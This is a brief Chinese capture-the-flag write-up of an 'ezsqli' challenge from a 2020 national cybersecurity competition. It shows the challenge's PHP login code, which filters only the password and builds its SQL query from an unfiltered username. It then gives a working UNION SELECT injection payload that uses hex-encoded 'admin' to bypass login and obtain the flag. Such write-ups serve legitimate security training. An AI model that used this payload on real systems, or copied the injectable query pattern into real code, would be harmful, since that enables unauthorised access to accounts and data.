![[2020网络安全管理职业技能竞赛全国选拔赛]ezsqli_php](https://file.cfanz.cn/uploads/png/2023/06/19/16/515J9P7W38.png "在这里插入图片描述")
![[2020网络安全管理职业技能竞赛全国选拔赛]ezsqli_php_02](https://file.cfanz.cn/uploads/png/2023/06/19/16/68e919G1e6.png "在这里插入图片描述")
hint
<?php
//a "part" of the source code here
function sqlWaf($s)
{
$filter = '/xml|extractvalue|regexp|copy|read|file|select|between|from|where|create|grand|dir|insert|link|substr|mid|server|drop|=|>|<|;|"|\^|\||\ |\'/i';
if (preg_match($filter,$s))
return False;
return True;
}
if (isset($_POST['username']) && isset($_POST['password'])) {
if (!isset($_SESSION['VerifyCode']))
die("?");
$username = strval($_POST['username']);
$password = strval($_POST['password']);
if ( !sqlWaf($password) )
alertMes('damn hacker' ,"./index.php");
$sql = "SELECT * FROM users WHERE username='${username}' AND password= '${password}'";
// password format: /[A-Za-z0-9]/
$result = $conn->query($sql);
if ($result->num_rows > 0) {
$row = $result->fetch_assoc();
if ( $row['username'] === 'admin' && $row['password'] )
{
if ($row['password'] == $password)
{
$message = $FLAG;
} else {
$message = "username or password wrong, are you admin?";
}
} else {
$message = "wrong user";
}
} else {
$message = "user not exist or wrong password";
}
}
?>username没有做任何过滤,为所欲为
一开始以为是group by rollup with,结果发现没办法使得这里为真
if ( $row['username'] === 'admin' && $row['password'] )然后发现这题原来很简单
![[2020网络安全管理职业技能竞赛全国选拔赛]ezsqli_sql_03](https://file.cfanz.cn/uploads/png/2023/06/19/16/4E5OfL0SJ2.png "在这里插入图片描述")
![[2020网络安全管理职业技能竞赛全国选拔赛]ezsqli_xml_04](https://file.cfanz.cn/uploads/png/2023/06/19/16/2IX5ce41XC.png "在这里插入图片描述")
username=1'union select 1,0x61646d696e,3#&password=3&captcha=XXXX![[2020网络安全管理职业技能竞赛全国选拔赛]ezsqli_sql_05](https://file.cfanz.cn/uploads/png/2023/06/19/16/G8Zc7CcaT3.png "在这里插入图片描述")
